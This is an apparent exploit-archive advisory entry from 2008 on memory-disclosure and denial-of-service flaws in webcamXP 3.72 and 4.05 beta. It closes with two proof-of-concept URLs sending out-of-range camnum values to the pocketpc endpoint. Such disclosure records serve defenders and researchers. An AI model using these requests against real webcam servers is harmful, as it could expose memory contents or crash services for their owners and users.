WebcamXP 3.72.4404.05.280 Beta - pocketpc?camnum Arbitrary Memory Disclosure

2008-02-18T00:00:00
ID EXPLOITPACK:F4DE8CB42B31DBA5060ED95507E5FA08
Type exploitpack
Reporter Luigi Auriemma
Modified 2008-02-18T00:00:00

Description

WebcamXP 3.72.4404.05.280 Beta - pocketpc?camnum Arbitrary Memory Disclosure

                                        
                                            source: https://www.securityfocus.com/bid/27875/info

webcamXP is prone to multiple information-disclosure and denial-of-service vulnerabilities because it fails to check user-supplied input data.

Attackers can exploit these issues to access potentially sensitive information or crash the application. Successful exploits could aid in further attacks or deny service to legitimate users.

These issues affect webcamXP 3.72.440 and 4.05.280 beta and prior versions.

http://www.example.com:8080/pocketpc?camnum=999999&mode=0
http://www.example.com:8080/pocketpc?camnum=-999999&mode=0